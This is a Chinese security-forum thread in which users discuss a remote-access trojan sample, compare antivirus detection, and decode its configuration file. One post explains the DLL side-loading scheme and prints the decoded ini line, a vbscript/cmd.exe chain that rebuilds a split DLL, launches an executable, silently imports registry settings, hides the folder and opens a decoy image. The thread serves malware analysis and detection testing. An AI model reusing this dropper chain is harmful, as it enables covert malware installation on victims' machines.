超强远控木马！！

显示全部楼层 · 发表于 2018-6-4 20:53:34

PercyDan 发表于 2018-6-4 20:52
乱码什么鬼。。。

我不会解密，求大神帮忙………………

显示全部楼层 · 发表于 2018-6-4 20:55:06

本帖最后由 kxmp 于 2018-6-4 20:57 编辑

eset

https://www.virustotal.com/zh-cn ... nalysis/1528116755/
有人来双击么?!?!
mcafee的试下看看然后能不能拉黑?

显示全部楼层 · 发表于 2018-6-4 20:55:20

ELOHIM 发表于 2018-6-4 20:53
我不会解密，求大神帮忙………………

解密什么

显示全部楼层 · 发表于 2018-6-4 20:57:35

管家既然杀啦？

显示全部楼层 · 发表于 2018-6-4 20:57:45

PercyDan 发表于 2018-6-4 20:55
解密什么

这个配置文件。。

显示全部楼层 · 发表于 2018-6-4 20:58:51

ELOHIM 发表于 2018-6-4 20:57
这个配置文件。。

我也不会

显示全部楼层 · 发表于 2018-6-4 21:00:58

ELOHIM 发表于 2018-6-4 20:57
这个配置文件。。

双击看看mcafee之类的能不能自己研究出来 (机器学习或者云)
看看他之后能不能拉黑才有意思....

那个dll是拆分成2个文件的
然后白加黑还必须载入另一个白dll
这个dll会再载入那个log文件. 不知道那个nv的dll是否是经过修改的.

显示全部楼层 · 发表于 2018-6-4 21:02:40

kxmp 发表于 2018-6-4 21:00
双击看看mcafee之类的能不能自己研究出来 (机器学习或者云)
看看他之后能不能拉黑才有意思....

可是洁癖不想安装mcafee。。

就是这个ini文件，怎么看到源码呢。。。

这种编码是unicode还是ascII ？？

显示全部楼层 · 发表于 2018-6-4 21:16:00

本帖最后由 kxmp 于 2018-6-4 21:17 编辑

ELOHIM 发表于 2018-6-4 21:02
可是洁癖不想安装mcafee。。

就是这个ini文件，怎么看到源码呢。。。

我意思楼上那几人要是有沙盘的话跑一下...
ini是记事本的bug

xx
cls
[game]
gameExec=TD\nircmd.exe
para=vbscript:createobject("wscript.shell").run("cmd.exe /c md C:\TD© TD\TD\* C:\TD\© /b TD\TD\head+TD\TD\tale C:\TD\bugrpt.dll&start C:\TD\Runtime.exe®edit /s TD\1.reg&attrib +s +h c:\td&start TD\1.jpg",0)(window.close)

显示全部楼层 · 发表于 2018-6-4 21:19:00

kxmp 发表于 2018-6-4 21:00
双击看看mcafee之类的能不能自己研究出来 (机器学习或者云)
看看他之后能不能拉黑才有意思....

咖啡双击miss

[病毒样本] 超强远控木马！！

评分

本帖子中包含更多资源